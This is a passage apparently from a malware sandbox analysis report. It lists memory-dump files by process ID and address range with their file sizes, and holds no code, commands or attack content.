                          • memory/920-1890-0x0000000000200000-0x000000000066A000-memory.dmp

                            Filesize

                            4.4MB

                          • memory/992-118-0x0000000006580000-0x0000000006A46000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/992-117-0x0000000006580000-0x0000000006A46000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/1568-82-0x0000000000380000-0x0000000000846000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/1568-66-0x0000000000380000-0x0000000000846000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/1628-127-0x000000001B780000-0x000000001BA62000-memory.dmp

                            Filesize

                            2.9MB

                          • memory/1628-128-0x00000000020C0000-0x00000000020C8000-memory.dmp

                            Filesize

                            32KB

                          • memory/1672-237-0x00000000008D0000-0x0000000000A2C000-memory.dmp

                            Filesize

                            1.4MB

                          • memory/1672-256-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-1566-0x00000000021D0000-0x0000000002224000-memory.dmp

                            Filesize

                            336KB

                          • memory/1672-1565-0x0000000002140000-0x000000000218C000-memory.dmp

                            Filesize

                            304KB

                          • memory/1672-238-0x0000000004E60000-0x0000000004F90000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-252-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-254-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-274-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-272-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-270-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-268-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-266-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-262-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-260-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-258-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-1564-0x0000000004400000-0x0000000004486000-memory.dmp

                            Filesize

                            536KB

                          • memory/1672-250-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-248-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-246-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-244-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-240-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-264-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-239-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-242-0x0000000004E60000-0x0000000004F8A000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/1672-1562-0x0000000002080000-0x000000000210A000-memory.dmp

                            Filesize

                            552KB

                          • memory/2316-3407-0x0000000000AE0000-0x0000000000B40000-memory.dmp

                            Filesize

                            384KB

                          • memory/2412-2-0x0000000001061000-0x000000000108F000-memory.dmp

                            Filesize

                            184KB

                          • memory/2412-15-0x0000000001060000-0x0000000001520000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2412-0-0x0000000001060000-0x0000000001520000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2412-1-0x0000000077590000-0x0000000077592000-memory.dmp

                            Filesize

                            8KB

                          • memory/2412-3-0x0000000001060000-0x0000000001520000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2412-5-0x0000000001060000-0x0000000001520000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2508-195-0x0000000000400000-0x000000000042F000-memory.dmp

                            Filesize

                            188KB

                          • memory/2508-218-0x0000000010000000-0x000000001001C000-memory.dmp

                            Filesize

                            112KB

                          • memory/2508-197-0x0000000000400000-0x000000000042F000-memory.dmp

                            Filesize

                            188KB

                          • memory/2664-214-0x0000000006800000-0x0000000007431000-memory.dmp

                            Filesize

                            12.2MB

                          • memory/2664-37-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-191-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-16-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-17-0x0000000001251000-0x000000000127F000-memory.dmp

                            Filesize

                            184KB

                          • memory/2664-143-0x0000000006800000-0x0000000007208000-memory.dmp

                            Filesize

                            10.0MB

                          • memory/2664-144-0x0000000006800000-0x0000000007208000-memory.dmp

                            Filesize

                            10.0MB

                          • memory/2664-18-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-20-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-36-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-192-0x0000000006800000-0x0000000007208000-memory.dmp

                            Filesize

                            10.0MB

                          • memory/2664-212-0x0000000006800000-0x0000000007431000-memory.dmp

                            Filesize

                            12.2MB

                          • memory/2664-108-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-1574-0x0000000006800000-0x0000000007431000-memory.dmp

                            Filesize

                            12.2MB

                          • memory/2664-222-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2664-21-0x0000000001250000-0x0000000001710000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2788-194-0x0000000000380000-0x0000000000D88000-memory.dmp

                            Filesize

                            10.0MB

                          • memory/2788-146-0x0000000000380000-0x0000000000D88000-memory.dmp

                            Filesize

                            10.0MB

                          • memory/2788-193-0x0000000000380000-0x0000000000D88000-memory.dmp

                            Filesize

                            10.0MB

                          • memory/2788-196-0x0000000000380000-0x0000000000D88000-memory.dmp

                            Filesize

                            10.0MB

                          • memory/2880-120-0x0000000000140000-0x0000000000606000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2880-121-0x0000000000140000-0x0000000000606000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2900-34-0x0000000001340000-0x0000000001352000-memory.dmp

                            Filesize

                            72KB

                          • memory/2900-35-0x0000000000240000-0x0000000000250000-memory.dmp

                            Filesize

                            64KB

                          • memory/3040-160-0x0000000000310000-0x0000000000388000-memory.dmp

                            Filesize

                            480KB

                          • memory/3368-3361-0x00000000011C0000-0x00000000011D2000-memory.dmp

                            Filesize

                            72KB

                          • memory/4048-1905-0x0000000000B10000-0x0000000000C6C000-memory.dmp

                            Filesize

                            1.4MB

                          • memory/4312-3290-0x0000000001020000-0x0000000001090000-memory.dmp

                            Filesize

                            448KB

                          • memory/4664-3372-0x0000000019EC0000-0x000000001A1A2000-memory.dmp

                            Filesize

                            2.9MB

                          • memory/4664-3373-0x00000000009D0000-0x00000000009D8000-memory.dmp

                            Filesize

                            32KB

                          • memory/4888-3370-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

                            Filesize

                            32KB

                          • memory/4888-3369-0x000000001B630000-0x000000001B912000-memory.dmp

                            Filesize

                            2.9MB

                          • memory/5336-3481-0x0000000002760000-0x0000000002768000-memory.dmp

                            Filesize

                            32KB